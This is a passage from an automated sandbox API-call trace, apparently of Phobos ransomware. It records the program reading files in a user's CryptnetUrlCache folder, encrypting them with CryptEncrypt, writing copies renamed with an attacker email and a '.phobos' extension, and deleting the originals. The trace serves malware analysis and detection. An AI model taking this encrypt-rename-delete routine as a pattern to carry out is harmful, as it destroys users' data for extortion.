(hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.072] ReadFile (in: hFile=0x168, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x188, lpOverlapped=0x0) returned 1 [0198.087] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.087] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.088] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0198.088] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.088] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.088] CryptDestroyKey (hKey=0xa32a28) returned 1 [0198.088] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.088] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0198.088] CloseHandle (hObject=0x168) returned 1 [0198.088] CloseHandle (hObject=0xac) returned 1 [0198.088] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f")) returned 1 [0198.089] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0198.090] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=392) returned 1 [0198.090] CloseHandle (hObject=0xac) returned 1 [0198.090] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416")) returned 0x2024 [0198.090] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0198.090] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.090] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0198.091] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0198.091] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.091] ReadFile (in: hFile=0xac, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x188, lpOverlapped=0x0) returned 1 [0198.092] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.092] WriteFile (in: hFile=0x168, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.093] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0198.093] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.093] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.093] CryptDestroyKey (hKey=0xa32a28) returned 1 [0198.093] WriteFile (in: hFile=0x168, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.093] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0198.093] CloseHandle (hObject=0xac) returned 1 [0198.093] CloseHandle (hObject=0x168) returned 1 [0198.093] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416")) returned 1 [0198.094] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.101] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=406) returned 1 [0198.101] CloseHandle (hObject=0x15c) returned 1 [0198.101] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61")) returned 0x2024 [0198.101] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.102] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.102] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.102] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.102] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.102] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x196, lpOverlapped=0x0) returned 1 [0198.103] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a0) returned 1 [0198.103] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a0, lpOverlapped=0x0) returned 1 [0198.104] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa329e8) returned 1 [0198.104] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.104] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.104] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.104] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.104] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.104] CloseHandle (hObject=0x15c) returned 1 [0198.104] CloseHandle (hObject=0x140) returned 1 [0198.104] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61")) returned 1 [0198.105] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.106] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=342) returned 1 [0198.106] CloseHandle (hObject=0x140) returned 1 [0198.106] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015")) returned 0x2024 [0198.106] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.106] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.106] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.106] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.106] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.106] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x156, lpOverlapped=0x0) returned 1 [0198.107] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x160, dwBufLen=0x160 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x160) returned 1 [0198.107] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x160, lpOverlapped=0x0) returned 1 [0198.108] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa329e8) returned 1 [0198.108] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.108] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0198.108] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.108] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0198.108] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.108] CloseHandle (hObject=0x140) returned 1 [0198.108] CloseHandle (hObject=0x15c) returned 1 [0198.109] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015")) returned 1 [0198.109] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.110] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=404) returned 1 [0198.110] CloseHandle (hObject=0x15c) returned 1 [0198.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9")) returned 0x2024 [0198.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.110] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.110] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.111] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.111] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.111] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x194, lpOverlapped=0x0) returned 1 [0198.112] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a0) returned 1 [0198.112] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a0, lpOverlapped=0x0) returned 1 [0198.113] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa329e8) returned 1 [0198.113] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.113] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.113] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.113] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.113] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.113] CloseHandle (hObject=0x15c) returned 1 [0198.113] CloseHandle (hObject=0x140) returned 1 [0198.113] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9")) returned 1 [0198.114] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.114] CreateFileW 